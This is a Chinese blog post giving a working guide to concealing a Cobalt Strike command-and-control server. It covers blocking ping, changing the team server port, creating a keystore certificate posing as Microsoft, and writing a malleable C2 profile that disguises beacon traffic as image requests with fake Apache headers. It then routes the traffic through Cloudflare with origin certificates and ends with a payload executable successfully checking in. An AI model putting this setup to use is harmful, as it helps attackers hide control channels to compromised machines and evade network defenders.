文章最后更新时间为:2022 年 03 月 08 日 20:45:02 Loading... 1.服务器开启禁ping 命令: > vim /etc/sysctl.conf 添加一行 > net.ipv4.icmp_echo_ignore_all = 1 保存,然后刷新配置 > sysctl -p 2.修改Cobalt Strike的端口 编辑`teamserver`文件 ![2021-12-17T09:50:44.png][1] 修改`50050`为其他端口 3.修改cs默认证书 编辑`teamserver`文件 > keytool -keystore 生成的keystore文件名 -storepass 密钥 -keypass 密钥 -genkey -keyalg RSA -alias 别名 -dname "CN=*.microsoft.com, OU=Microsoft Corporation, O=Microsoft Corporation, L=Redmond, S=WA, C=US" > keytool -keystore ./cobaltstrike.store -storepass Microsoft -keypass Microsoft -genkey -keyalg RSA -alias cobaltstrike -dname "CN=*.microsoft.com, OU=Microsoft Corporation, O=Microsoft Corporation, L=Redmond, S=WA, C=US" 修改一些关键词信息即可 4.修改流量特征,新建`.profile`的文件 https-certificate { set keystore "new.store"; #证书名字 set password "bypass"; #证书密码 } #以上没有配置cloudflare的时候可以先不写 http-get { set uri "/image/"; client { header "Accept" "text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8"; header "Referer" "http://www.google.com"; header "Host" "xxxx.net"; #域名,还没有配置cloudflare的时候这一行注释掉 header "Pragma" "no-cache"; header "Cache-Control" "no-cache"; metadata { netbios; append ".jpg"; # 传输内容自动追加的后缀 uri-append; } } server { header "Content-Type" "img/jpg"; header "Server" "Apache"; header "X-Powered-By" "Apache"; output { base64; # 加密方式(base64、base64url、netbios、netbiosu) print; } } } http-post { set uri "/email/"; client { header "Content-Type" "application/octet-stream"; header "Referer" "http://www.google.com"; header "Host" "xxxx.net"; #域名,还没有配置cloudflare的时候这一行注释掉 header "Pragma" "no-cache"; header "Cache-Control" "no-cache"; id { netbiosu; append ".png"; uri-append; } output { base64; print; } } server { header "Content-Type" "img/jpg"; header "Server" "Apache"; header "X-Powered-By" "Apache"; output { base64; print; } } } http-config { set headers "Server, Cache-Control, Connection, X-Powered-By"; header "Server" "Apache"; header "Cache-Control" "max-age=1"; header "Connection" "keep-alive"; header "X-Powered-By" "Apache"; set trust_x_forwarded_for "true"; } 根据注释,自行修改配置。 然后测试配置 > ./c2lint xxx.profile ![2021-12-17T10:13:11.png][2] 测试成功 5.到cloudflare添加域名,并修改dns 开启自动HTTPS重写 ![2021-12-17T10:16:06.png][3] 开启始终使用 HTTPS ![2021-12-17T10:16:33.png][4] 关闭Brotli ![2021-12-17T10:17:13.png][5] 开启开发者模式 ![2021-12-17T10:17:55.png][6] 记录指向服务器IP ![2021-12-17T10:18:41.png][7] SSL/TLS修改为`完全` ![2021-12-17T10:19:12.png][8] 点击`源服务器`-`创建证书`-`创建` ![2021-12-17T10:32:50.png][9] 分别复制保存为`.pem`和`.key`的文件并上传到服务器 6.创建store证书 > openssl pkcs12 -export -in 证书文件 -inkey 私钥文件 -out p12文件名 -name 域名 -passout pass:密码 > openssl pkcs12 -export -in xxx.pem -inkey xxx.key -out xxx.p12 -name xxxxx.com -passout pass:password > keytool -importkeystore -deststorepass 密码 -destkeypass 密码 -destkeystore 新store名 -srckeystore p12文件名 -srcstoretype PKCS12 -srcstorepass 密码 -alias 别名 > keytool -importkeystore -deststorepass password -destkeypass password -destkeystore xxx.store -srckeystore xxx.p12 -srcstoretype PKCS12 -srcstorepass password -alias xxxx 7.修改刚才的`.profile`文件 8.测试配置 > ./teamserver 服务器IP 密码 xxx.profile 开启监听 ![2021-12-17T10:40:50.png][10] cloudflare可用的https端口为:443、2053、2083、2087、2096、8443 生成exe程序并执行 上线成功 ![2021-12-17T10:43:18.png][11] 参考链接: https://lengjibo.github.io/malleable/ https://bbs.zkaq.cn/t/5775.html [1]: https://cdn.jsdelivr.net/gh/R0A1NG/wenzhangupload@latest/usr/uploads/2021/12/548525305.png [2]: https://cdn.jsdelivr.net/gh/R0A1NG/wenzhangupload@latest/usr/uploads/2021/12/3770253967.png [3]: https://cdn.jsdelivr.net/gh/R0A1NG/wenzhangupload@latest/usr/uploads/2021/12/417516751.png [4]: https://cdn.jsdelivr.net/gh/R0A1NG/wenzhangupload@latest/usr/uploads/2021/12/791090077.png [5]: https://cdn.jsdelivr.net/gh/R0A1NG/wenzhangupload@latest/usr/uploads/2021/12/2755797092.png [6]: https://cdn.jsdelivr.net/gh/R0A1NG/wenzhangupload@latest/usr/uploads/2021/12/1580821730.png [7]: https://cdn.jsdelivr.net/gh/R0A1NG/wenzhangupload@latest/usr/uploads/2021/12/511823449.png [8]: https://cdn.jsdelivr.net/gh/R0A1NG/wenzhangupload@latest/usr/uploads/2021/12/22497855.png [9]: https://cdn.jsdelivr.net/gh/R0A1NG/wenzhangupload@latest/usr/uploads/2021/12/3404110373.png [10]: https://cdn.jsdelivr.net/gh/R0A1NG/wenzhangupload@latest/usr/uploads/2021/12/4049818146.png [11]: https://cdn.jsdelivr.net/gh/R0A1NG/wenzhangupload@latest/usr/uploads/2021/12/2613382320.png Last modification:March 8, 2022 © Allow specification reprint Support Appreciate the author Like 0 如果觉得我的文章对你有用,请随意赞赏